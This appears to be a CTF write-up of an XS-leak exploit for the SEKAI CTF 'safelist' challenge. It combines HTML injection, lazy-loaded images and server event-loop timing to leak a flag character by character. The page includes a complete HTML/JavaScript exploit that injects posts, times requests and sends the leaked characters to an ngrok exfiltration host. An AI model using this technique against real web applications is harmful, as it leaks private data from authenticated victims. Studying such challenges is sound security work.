In this exploit, @aszx87410 mixes the lazy image side channel technique through a HTML injection with kind of event loop blocking technique to leak chars.
This is a different exploit for the CTF chall that was already commented in the following page. take a look for more info about the challenge:
An attacker can inject a post starting with "A", then some HTML tag (like a big <canvas) will fulfil most of the screen and some final <img lazy tags to load things.
If instead of an "A" the attacker injects the same post but starting with a "z". The post with the flag will appear first, then the injectedpost will appear with the initial "z" and the bigcanvas. Because the post with the flag appeared first, the first canvas will occupy all the screen and the final <img lazy tags injected won't be seen in the screen, so they won't be loaded.
Then, while the bot is accessing the page, the attacker will send fetch requests.
If the images injected in the post are being loaded, these fetch requests will take longer, so the attacker knows that the post is before the flag (alphabetically).
If the the fetch requests are fast, it means that the post is alphabeticallyafter the flag.
Let's check the code:
<!DOCTYPEhtml><html><!-- The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster. By using a well-crafted height, we can let note with "A" load image but note with "Z" not load. We can use fetch to measure the request time.--><body> <buttononclick="run()">start</button><!-- Inject post with payload --> <formid=faction="http://localhost:1234/create"method="POST"target="_blank"> <inputid=inpname="text"value=""> </form><!-- Remove index --> <formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"> <inputid=inp2name="index"value=""> </form> <script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c) flag += cbreak } } },0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/* For 3350, you need to test it on your local to get this number. The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold. */// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flag inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()setTimeout(() => {run(str, resolve) },500) }) }asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET) }let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', { mode:'no-cors' }).catch(err=>1)let end =performance.now() t += end - sconsole.log(end - s) }constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/* I get this threshold(1000ms) by trying multiple times on remote admin bot for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold */constisFound= (t >=1000)if (isFound) {inp2.value ="0" } else {inp2.value ="1" }// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound) },200) },200) } </script></body></html>